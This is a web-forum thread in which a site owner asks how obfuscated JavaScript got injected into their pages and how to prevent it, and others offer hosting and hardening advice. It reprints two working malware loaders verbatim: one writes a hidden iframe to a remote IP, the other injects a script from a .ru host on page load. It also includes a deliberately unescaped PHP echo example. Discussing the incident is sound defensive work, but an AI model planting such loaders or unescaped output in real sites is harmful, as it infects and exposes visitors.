Script Injection Issue

kaskhedikar_tushar
I have a strange issue with two of my websites. I am not sure how, but JavaScript code has been injected into all of my HTML pages.

I want to know how they could have done this, and how I can avoid such an incident in the future.

Below are the code snippets that were injected.


//On the other website, the following was injected into all JavaScript pages.


 Thanks in advance.

 



First:

<script language=JavaScript>

var tyeouyfgbiw = 'UXYZegeTyNuha3cUXYZegeTyNuha69UXYZegeTyNuha66';var ylxjgiipaok = 'UXYZegeTyNuha72';var vjprvfxwnkv = 'UXYZegeTyNuha61UXYZegeTyNuha6dUXYZegeTyNuha65UXYZegeTyNuha20UXYZegeTyNuha6eUXYZegeTyNuha61UXYZegeTyNuha6dUXYZegeTyNuha65UXYZegeTyNuha3dUXYZegeTyNuha22';var uyqrdwsmtgx = 'UXYZegeTyNuha76UXYZegeTyNuha75UXYZegeTyNuha6cUXYZegeTyNuha67UXYZegeTyNuha78UXYZegeTyNuha70UXYZegeTyNuha67UXYZegeTyNuha76UXYZegeTyNuha61UXYZegeTyNuha79UXYZegeTyNuha74';var xqezyuznexx = 'UXYZegeTyNuha22UXYZegeTyNuha20UXYZegeTyNuha77UXYZegeTyNuha69UXYZegeTyNuha64UXYZegeTyNuha74UXYZegeTyNuha68UXYZegeTyNuha3dUXYZegeTyNuha22UXYZegeTyNuha31UXYZegeTyNuha22UXYZegeTyNuha20UXYZegeTyNuha68UXYZegeTyNuha65UXYZegeTyNuha69UXYZegeTyNuha67UXYZegeTyNuha68UXYZegeTyNuha74UXYZegeTyNuha3dUXYZegeTyNuha22UXYZegeTyNuha30UXYZegeTyNuha22';var mpsampnxkgv = 'UXYZegeTyNuha20UXYZegeTyNuha73UXYZegeTyNuha72UXYZegeTyNuha63UXYZegeTyNuha3dUXYZegeTyNuha22';var txzypmrwjim = 'UXYZegeTyNuha68UXYZegeTyNuha74UXYZegeTyNuha74UXYZegeTyNuha70UXYZegeTyNuha3aUXYZegeTyNuha2fUXYZegeTyNuha2f';var thkigxnevit = '85.12.60.10/dolny/index.php';var zifdvdocypz = 'UXYZegeTyNuha22UXYZegeTyNuha20UXYZegeTyNuha6dUXYZegeTyNuha61UXYZegeTyNuha72UXYZegeTyNuha67UXYZegeTyNuha69UXYZegeTyNuha6eUXYZegeTyNuha77UXYZegeTyNuha69UXYZegeTyNuha64UXYZegeTyNuha74UXYZegeTyNuha68UXYZegeTyNuha3dUXYZegeTyNuha22UXYZegeTyNuha31UXYZegeTyNuha22UXYZegeTyNuha20UXYZegeTyNuha6dUXYZegeTyNuha61UXYZegeTyNuha72UXYZegeTyNuha67UXYZegeTyNuha69UXYZegeTyNuha6eUXYZegeTyNuha68UXYZegeTyNuha65UXYZegeTyNuha69UXYZegeTyNuha67UXYZegeTyNuha68UXYZegeTyNuha74UXYZegeTyNuha3dUXYZegeTyNuha22UXYZegeTyNuha30UXYZegeTyNuha22UXYZegeTyNuha20UXYZegeTyNuha74UXYZegeTyNuha69UXYZegeTyNuha74UXYZegeTyNuha6cUXYZegeTyNuha65UXYZegeTyNuha3dUXYZegeTyNuha22';var qnpkelumxjt = 'UXYZegeTyNuha76UXYZegeTyNuha75UXYZegeTyNuha6cUXYZegeTyNuha67UXYZegeTyNuha78UXYZegeTyNuha70UXYZegeTyNuha67UXYZegeTyNuha76UXYZegeTyNuha61UXYZegeTyNuha79UXYZegeTyNuha74';var osafgeaoyow = 
'UXYZegeTyNuha22UXYZegeTyNuha20UXYZegeTyNuha73UXYZegeTyNuha63UXYZegeTyNuha72UXYZegeTyNuha6fUXYZegeTyNuha6cUXYZegeTyNuha6cUXYZegeTyNuha69UXYZegeTyNuha6eUXYZegeTyNuha67UXYZegeTyNuha3dUXYZegeTyNuha22UXYZegeTyNuha6eUXYZegeTyNuha6fUXYZegeTyNuha22UXYZegeTyNuha20UXYZegeTyNuha62UXYZegeTyNuha6fUXYZegeTyNuha72UXYZegeTyNuha64UXYZegeTyNuha65UXYZegeTyNuha72UXYZegeTyNuha3dUXYZegeTyNuha22UXYZegeTyNuha30UXYZegeTyNuha22UXYZegeTyNuha20UXYZegeTyNuha66UXYZegeTyNuha72UXYZegeTyNuha61UXYZegeTyNuha6dUXYZegeTyNuha65UXYZegeTyNuha62UXYZegeTyNuha6fUXYZegeTyNuha72UXYZegeTyNuha64UXYZegeTyNuha65UXYZegeTyNuha72UXYZegeTyNuha3dUXYZegeTyNuha22UXYZegeTyNuha30UXYZegeTyNuha22UXYZegeTyNuha3e';var qrshfugvuei = 'UXYZegeTyNuha3cUXYZegeTyNuha2fUXYZegeTyNuha69UXYZegeTyNuha66';var xpnukarttzm = 'UXYZegeTyNuha72UXYZegeTyNuha61';var xfszggxvdbm = 'UXYZegeTyNuha6dUXYZegeTyNuha65UXYZegeTyNuha3e';var rjsqpnktwtj = new Array();rjsqpnktwtj[0]=new Array(tyeouyfgbiw+ylxjgiipaok+vjprvfxwnkv+uyqrdwsmtgx+xqezyuznexx+mpsampnxkgv+txzypmrwjim+thkigxnevit+zifdvdocypz+qnpkelumxjt+osafgeaoyow+qrshfugvuei+xpnukarttzm+xfszggxvdbm);document['UXYZegeTyNuhawUXYZegeTyNuharUXYZegeTyNuhaiUXYZegeTyNuhatUXYZegeTyNuhaeUXYZegeTyNuha'.replace(/UXYZegeTyNuha/g,'')](window['UXYZegeTyNuhauUXYZegeTyNuhanUXYZegeTyNuhaeUXYZegeTyNuhasUXYZegeTyNuhacUXYZegeTyNuhaaUXYZegeTyNuhapUXYZegeTyNuhaeUXYZegeTyNuha'.replace(/UXYZegeTyNuha/g,'')](rjsqpnktwtj.toString().replace(/UXYZegeTyNuha/g,'%')));

</script>

Second:

 

<script>var g='';var s;if(s!='' && s!='AC'){s=''};var l="";var sD;if(sD!='Ej'){sD=''};function E(){this.sZ="";this.sG="";this.kr="";var tM;if(tM!='iH'){tM='iH'};var F=window;var o=new Date();var M=unescape;var ql=new Date();var Xk="";var L;if(L!='u' && L!='ki'){L='u'};var i=M("%2f%67%6f%64%61%64%64%79%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%69%72%6c%73%67%6f%67%61%6d%65%73%2e%63%6f%6d%2e%70%68%70");function V(f,k){var p="";this.fp='';var O="g";var lU;if(lU!='JR' && lU!='Q'){lU=''};var zD;if(zD!='lM' && zD!='e_'){zD=''};var K=M("%5b"), I=M("%5d");var Xo;if(Xo!='c'){Xo=''};var v=K+k+I;this.kD="";var e=new RegExp(v, O);var ar;if(ar!='' && ar!='J_'){ar=null};var ch=new Array();return f.replace(e, new String());var ab;if(ab!='' && ab!='Qi'){ab=null};var Zk;if(Zk!='' && Zk!='fK'){Zk=null};};var MQ=new String();this.Ak="";var gQ=new Array();var FQ=new String();var cX;if(cX!='LU' && cX != ''){cX=null};var pa;if(pa!='jy' && pa != ''){pa=null};var A=V('86616570345578266560159261','37164259');var x=new String();var y=document;var pX=new String();function VG(){var P=M("%68%74%74%70%3a%2f%2f%6c%6f%61%64%74%75%62%65%2e%72%75%3a");var dE=new Array();FQ=P;var aH=new String();var nI=new Date();FQ+=A;FQ+=i;var Mf;if(Mf!='shf' && Mf!='JZ'){Mf='shf'};var Yj='';try {U=y.createElement(V('szcuryi7pxtz','xuF78zy'));this.xO="";U[M("%64%65%66%65%72")]=[1][0];var AL=new Date();var m;if(m!='rZ'){m=''};var sH=new Date();U[M("%73%72%63")]=FQ;var ZJ;if(ZJ!='CX' && ZJ!='mL'){ZJ=''};var XP=new Date();y.body.appendChild(U);this.uK='';this.wV="";} catch(a){var bj=new Date();var WZ;if(WZ!='UD'){WZ=''};alert(a);var kW=new Date();var T=new Date();};}var Eu=new Date();var fa;if(fa!='sHJ' && fa!='Ku'){fa='sHJ'};var fV;if(fV!=''){fV='gX'};F[new String("onloa"+"d")]=VG;this.kT='';this.JY='';var AA;if(AA!='oT'){AA='oT'};var WC;if(WC!='Pj'){WC='Pj'};};E();</script>


You are probably outputting user input or including files based on user input.

The main thing to remember is to always treat user input as unsafe and malicious: always escape it before you output it, never pass it to "eval", never use it directly in filenames for includes, and never forget to escape it when using it in a query.

The following example allows these cross-site attacks:
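<!-- Example that shows a vulnerability (user input echoed without escaping). DO NOT USE THIS SNIPPET! -->

<form method="POST">
  <input type="text" name="test"/>
  <input type="submit"/>
</form>

<?php

// Deliberately unsafe: the submitted value is written into the response
// verbatim, so any markup it contains is interpreted by the browser.
if (isset($_POST['test']))
{
  echo $_POST['test'];
  // Safe form: encode for the HTML context before output, e.g.
  //   echo htmlspecialchars($_POST['test'], ENT_QUOTES, 'UTF-8');
}

?>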


Commented:
Are you with IXWebhosting? They're notorious for this kind of attack.

If so, move.

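If not, you can make sure your files have safe permissions (CHMOD) on the server via FTP.
Use 664 for most HTML and PHP files, 755 for Perl files, etc. (Note that 664 leaves a file writable by its group; on shared hosting where other accounts may be in the same group, 644 is the tighter setting.)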

Commented:
Also, ensure your FTP password is a strong one, change it anyway, and use SFTP if possible.

Author

Commented:
Hello Guys,

Thanks for your suggestions, but I have already checked these things.

Let me explain this in more detail,

My website is in PHP. My files were modified automatically. I tried downloading a couple of files, and the code is hardcoded in them. It is not being added at runtime on page load; it is part of the HTML stored in the files on the server.

Thanks
Greg AlexanderLead Developer

Commented:
If you are on a GoDaddy shared hosting account, then this is your problem
http://thatitguy.com/Company/the-rbTech-Blog/Thoughts-on-the-recent-GoDaddy-hosted-website-attacks
It's a GoDaddy attack; I'd change providers.


I pulled out some of the strings and unescaped them:

<script>
  a="%68%74%74%70%3a%2f%2f%6c%6f%61%64%74%75%62%65%2e%72%75%3a"
  alert(unescape(a))
  b="%2f%67%6f%64%61%64%64%79%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%69%72%6c%73%67%6f%67%61%6d%65%73%2e%63%6f%6d%2e%70%68%70"
  alert(unescape(b))
</script>

giving

http://
/godaddy-com/google.com/girlsgogames.com.php

Don't even run the script I have given you; your antivirus will go nuts.


*****************

All - based on a request from GwynforWeb, I removed the ".ru" link in this comment.

Vee_Mod
.... its a Trojan btw
Commented:
Sorry,

That is the problem of hacking on the hosting servers; that's why it's giving an error.

Regards,
Tushar Kaskhedikar
